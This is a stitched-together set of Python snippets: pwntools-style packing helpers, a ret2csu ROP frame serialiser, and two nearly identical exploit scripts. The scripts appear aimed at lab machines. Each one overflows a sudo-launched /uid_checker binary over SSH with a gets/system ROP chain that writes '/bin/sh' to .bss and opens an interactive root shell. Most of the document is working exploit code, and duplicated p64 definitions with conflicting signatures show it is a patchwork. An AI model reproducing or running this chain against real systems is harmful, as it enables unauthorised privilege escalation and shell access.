    def __str__(self, count=1):
        """Serialise this frame as a packed 64-bit ROP chain.

        Layout, one little-endian qword per entry (via ``p64``)::

            addr | 0 | rbp | target | edi | rsi | rdx | addr - 0x1a

        NOTE(review): this looks like a ret2csu frame -- ``addr`` being the
        ``pop rbx..r15; ret`` gadget in ``__libc_csu_init`` and
        ``addr - 0x1a`` the ``mov``/``call`` gadget in front of it -- but the
        0x1a distance is specific to the glibc build the chain was written
        against; confirm it against the target binary before reusing.

        ``count`` only seeds ``self.rbp`` while ``self.rbp == 0``; once set
        the stored value is reused, so the first call's ``count`` wins and
        later calls silently ignore theirs.

        Returns the packed chain as raw bytes (a ``str`` on the Python 2
        pwntools this targets), not text: under Python 3 ``str(frame)`` would
        raise TypeError, so call ``frame.__str__()`` directly there.
        """
        if self.rbp == 0:
            self.rbp = count
        qwords = (
            self.addr,
            0,
            self.rbp,
            self.target,
            self.edi,
            self.rsi,
            self.rdx,
            self.addr - 0x1a,
        )
        return b"".join(p64(q) for q in qwords)
 def p64(self, *a, **kw):
     """Pack the arguments as one 64-bit integer and send the bytes down the tube.

     Thin wrapper: ``*a``/``**kw`` go straight to ``packing.p64`` (so its
     endianness/sign keywords apply) and the result of ``send`` is returned.
     """
     packed = packing.p64(*a, **kw)
     return self.send(packed)
 def p64(self, address, data, *a, **kw):
     """Write ``data`` as a 64-bit integer at ``address``; returns ``write``'s result."""
     packed = packing.p64(data, *a, **kw)
     return self.write(address, packed)
 def p32(self, address, data, *a, **kw):
     """Write ``data`` as a 32-bit integer at ``address``; returns ``write``'s result."""
     packed = packing.p32(data, *a, **kw)
     return self.write(address, packed)
File: elf.py  Project: tavakyan/pwntools
 def p64(self, address, data, *a, **kw):
     """Write the 64-bit integer ``data`` at ``address``.

     Extra positional/keyword arguments are forwarded to ``packing.p64``
     (endianness, signedness); the return value is whatever ``write`` returns.
     """
     packed = packing.p64(data, *a, **kw)
     return self.write(address, packed)
#!/usr/bin/env python3
from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64

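# Stack-overflow ROP chain against /uid_checker: gets(.bss) to drop "/bin/sh"
# into writable memory, then system(.bss).  Every address below is absolute,
# so this assumes a non-PIE build; offset and gadget/PLT addresses are
# specific to that build and must be re-derived (ROPgadget/ropper,
# `objdump -d`) for any other binary.
OFFSET = 88             # bytes from the overflowed buffer to the saved RIP
POP_RDI_RET = 0x400803  # pop rdi; ret -- sets the single argument of both calls
BSS = 0x601060          # writable scratch address that receives "/bin/sh"
GETS = 0x4005b0         # gets (PLT stub, presumably)
SYSTEM = 0x400570       # system (PLT stub, presumably)


def build_payload(offset=OFFSET, pop_rdi=POP_RDI_RET, scratch=BSS,
                  gets_addr=GETS, system_addr=SYSTEM):
    """Return the overflow padding followed by the gets/system chain.

    Each chain entry is a little-endian qword.  The padding is a ``cyclic``
    pattern rather than ``b"A" * offset`` so that a wrong ``offset`` shows up
    as a recognisable pattern in the crashing RIP instead of 0x41414141...
    """
    frames = [
        cyclic(offset),
        p64(pop_rdi), p64(scratch), p64(gets_addr),     # gets(scratch)
        p64(pop_rdi), p64(scratch), p64(system_addr),   # system(scratch)
    ]
    return b"".join(frames)


def main():
    """Deliver the chain over SSH and hand the resulting shell to the user."""
    payload = build_payload()
    # The target is launched through sudo, so this only works if the remote
    # sudoers entry is NOPASSWD for it -- a password prompt would otherwise
    # consume the payload.  The SSH user name is redacted in this listing.
    s = ssh(host='10.10.139.182', user='******')
    p = s.process(['sudo', '/uid_checker'])
    print(p.recv())       # whatever the target prints before reading input
    p.sendline(payload)   # overflow + ROP chain
    print(p.recv())
    # This line is what the chain's gets(scratch) reads and system() then runs.
    # Send bytes, not str: pwntools under Python 3 expects bytes and otherwise
    # has to guess an encoding (and warns about it).
    p.sendline(b"/bin/sh")
    p.interactive()


if __name__ == "__main__":
    main()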
from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64

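# Same chain as above, second run against a different box and with an
# explicit key file.  gets(.bss) stores "/bin/sh", system(.bss) runs it.
# Absolute addresses => non-PIE binary; everything below is build-specific.
OFFSET = 88             # Found with ropstar
# The original listing labelled this gadget "pop r15; ret", but the chain
# only works if it loads rdi (first argument of gets/system).  In the usual
# __libc_csu_init tail `pop rdi; ret` is the last two bytes of
# `pop r15; ret`, so the two readings refer to adjacent addresses -- verify
# which one 0x400803 actually is (e.g. `ROPgadget --binary uid_checker`).
POP_RDI_RET = 0x400803
BSS = 0x601060          # .bss scratch address that receives "/bin/sh"
GETS = 0x4005b0         # gets()
SYSTEM = 0x400570       # system()


def build_payload(offset=OFFSET, pop_rdi=POP_RDI_RET, scratch=BSS,
                  gets_addr=GETS, system_addr=SYSTEM):
    """Return the overflow padding followed by the gets/system chain.

    Each chain entry is a little-endian qword; the ``cyclic`` padding makes a
    wrong ``offset`` easy to spot from the pattern that lands in RIP.
    """
    frames = [
        cyclic(offset),
        p64(pop_rdi), p64(scratch), p64(gets_addr),     # gets(scratch)
        p64(pop_rdi), p64(scratch), p64(system_addr),   # system(scratch)
    ]
    return b"".join(frames)


def main():
    """Deliver the chain over SSH and hand the resulting shell to the user."""
    payload = build_payload()
    # Launched through sudo: assumes a NOPASSWD sudoers entry for the binary,
    # otherwise the password prompt would swallow the payload.  The SSH user
    # name is redacted in this listing.
    s = ssh(host='10.10.202.250', user='******', keyfile='./id_rsa')
    p = s.process(['sudo', '/uid_checker'])
    print(p.recv())       # whatever the target prints before reading input
    p.sendline(payload)   # overflow + ROP chain
    print(p.recv())
    # Consumed by the chain's gets(scratch) and then executed by system().
    # Bytes, not str: pwntools under Python 3 expects bytes and warns (and
    # guesses an encoding) when given text.
    p.sendline(b"/bin/sh")
    p.interactive(prompt='')


if __name__ == "__main__":
    main()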